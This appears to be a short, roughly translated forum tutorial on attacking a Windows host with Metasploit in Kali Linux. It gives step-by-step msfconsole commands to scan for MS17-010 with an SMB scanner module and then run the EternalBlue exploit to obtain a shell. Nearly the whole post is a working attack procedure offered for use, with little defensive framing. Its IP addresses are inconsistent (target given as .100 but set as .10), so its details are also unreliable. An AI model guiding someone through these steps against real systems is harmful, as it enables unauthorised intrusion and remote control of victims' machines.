Material:
Computer
VMware 12
Kali Linux.ISO
Internet
First:
Open Your Computer and VMware:
Second Open Your SSH Connection Tools, Eg Securt CRT,Putty.......
Input Msfconsole On Your Tools,
Let's Wait For Him To Be Successful...............
Ok,Screen Picture :
Then We Input use auxiliary/scanner/smb/smb_ms17_010
Show options
Set The Target Host IP Or IP Segment That You Need To Attack , Scan Them Leak ,And Know What Work Load Is Needed
My Attack Host Is 192.168.10.100 . This Is a Computer_Phone Server
Input : set rhosts 192.168.10.10 ( Attacted IP )
Exploit
If The Interface Is Like This , It Means There Is A Vulnerability,
So ,Let's Attack This Host.
Input : use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.10.100
Exploit
Successful Attack Host And Get Shell !!!!!!!!!
英文水平有限,兄弟们就将就讲究吧